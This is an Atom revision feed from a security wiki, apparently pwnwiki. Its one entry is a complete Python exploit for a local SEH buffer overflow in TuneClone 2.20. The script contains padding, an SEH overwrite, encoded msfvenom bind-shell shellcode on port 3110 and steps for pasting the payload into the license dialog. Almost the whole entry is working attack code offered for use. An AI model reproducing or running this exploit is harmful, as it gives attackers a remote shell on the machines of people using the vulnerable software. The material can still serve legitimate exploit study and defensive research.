<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Tuneclone_2.20_%E6%9C%AC%E5%9C%B0SEH%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>Tuneclone 2.20 本地SEH緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Tuneclone_2.20_%E6%9C%AC%E5%9C%B0SEH%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Tuneclone_2.20_%E6%9C%AC%E5%9C%B0SEH%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T12:18:25Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Tuneclone_2.20_%E6%9C%AC%E5%9C%B0SEH%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2008&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: TuneClone Local Seh Exploit # Date: 19.06.2019 # Vendor Homepage: http://www.tuneclone.com/ # Software Link:   http://www.tuneclone.com/tuneclon...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Tuneclone_2.20_%E6%9C%AC%E5%9C%B0SEH%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2008&amp;oldid=prev"/>
		<updated>2021-05-02T04:28:47Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: TuneClone Local Seh Exploit # Date: 19.06.2019 # Vendor Homepage: http://www.tuneclone.com/ # Software Link:   http://www.tuneclone.com/tuneclon...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: TuneClone Local Seh Exploit&lt;br /&gt;
# Date: 19.06.2019&lt;br /&gt;
# Vendor Homepage: http://www.tuneclone.com/&lt;br /&gt;
# Software Link:   http://www.tuneclone.com/tuneclone_setup.exe&lt;br /&gt;
# Exploit Author: Achilles&lt;br /&gt;
# Tested Version: 2.20&lt;br /&gt;
# Tested on: Windows XP SP3 EN&lt;br /&gt;
            &lt;br /&gt;
# 1.- Run python code : TuneClone.py&lt;br /&gt;
# 2.- Open EVIL.txt and copy content to Clipboard&lt;br /&gt;
# 3.- Open TuneClone and press Help and 'Enter License Code'&lt;br /&gt;
# 4.- Paste the Content of EVIL.txt into the 'Name and Code Field'&lt;br /&gt;
# 5.- Click 'OK' and you will have a bind shell port 3110.&lt;br /&gt;
# 6.- Greetings go:XiDreamzzXi,Metatron&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/env python&lt;br /&gt;
&lt;br /&gt;
import struct&lt;br /&gt;
&lt;br /&gt;
buffer = &amp;quot;\x41&amp;quot; * 1056&lt;br /&gt;
nseh = &amp;quot;\xeb\x06\x90\x90&amp;quot; #jmp short 6&lt;br /&gt;
seh  =  struct.pack('&amp;lt;L',0x583411c0) #msaud32.acm&lt;br /&gt;
nops =  &amp;quot;\x90&amp;quot; * 20&lt;br /&gt;
&lt;br /&gt;
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b &amp;quot;\x00\x0a\x0d&amp;quot; -i 1 -f python&lt;br /&gt;
#badchars &amp;quot;\x00\x0a\x0d&amp;quot;&lt;br /&gt;
shellcode = (&amp;quot;\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b&amp;quot; &lt;br /&gt;
&amp;quot;\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8&amp;quot;&lt;br /&gt;
&amp;quot;\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b&amp;quot;&lt;br /&gt;
&amp;quot;\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07&amp;quot;&lt;br /&gt;
&amp;quot;\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5&amp;quot;&lt;br /&gt;
&amp;quot;\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f&amp;quot;&lt;br /&gt;
&amp;quot;\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02&amp;quot;&lt;br /&gt;
&amp;quot;\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59&amp;quot;&lt;br /&gt;
&amp;quot;\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7&amp;quot;&lt;br /&gt;
&amp;quot;\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb&amp;quot;&lt;br /&gt;
&amp;quot;\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87&amp;quot;&lt;br /&gt;
&amp;quot;\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01&amp;quot;&lt;br /&gt;
&amp;quot;\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7&amp;quot;&lt;br /&gt;
&amp;quot;\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45&amp;quot;&lt;br /&gt;
&amp;quot;\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49&amp;quot;&lt;br /&gt;
&amp;quot;\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1&amp;quot;&lt;br /&gt;
&amp;quot;\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9&amp;quot;&lt;br /&gt;
&amp;quot;\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c&amp;quot;&lt;br /&gt;
&amp;quot;\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64&amp;quot;&lt;br /&gt;
&amp;quot;\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38&amp;quot;&lt;br /&gt;
&amp;quot;\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3&amp;quot;&lt;br /&gt;
&amp;quot;\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0&amp;quot;&lt;br /&gt;
&amp;quot;\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86&amp;quot;&lt;br /&gt;
&amp;quot;\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e&amp;quot;&lt;br /&gt;
&amp;quot;\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7&amp;quot;&lt;br /&gt;
&amp;quot;\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4&amp;quot;&lt;br /&gt;
&amp;quot;\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef&amp;quot;&lt;br /&gt;
&amp;quot;\x77\x03\x31\x3a&amp;quot;)&lt;br /&gt;
pad =&amp;quot;C&amp;quot; * (6000 - len(buffer) - len(nseh+seh) - len(nops) -len(shellcode))&lt;br /&gt;
payload = buffer + nseh + seh + nops + shellcode + pad&lt;br /&gt;
&lt;br /&gt;
try:&lt;br /&gt;
	f=open(&amp;quot;Evil.txt&amp;quot;,&amp;quot;w&amp;quot;)&lt;br /&gt;
	print &amp;quot;[+] Creating %s bytes evil payload..&amp;quot; %len(payload)&lt;br /&gt;
	f.write(payload)&lt;br /&gt;
	f.close()&lt;br /&gt;
	print &amp;quot;[+] File created!&amp;quot;&lt;br /&gt;
except:&lt;br /&gt;
	print &amp;quot;File cannot be created&amp;quot;&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>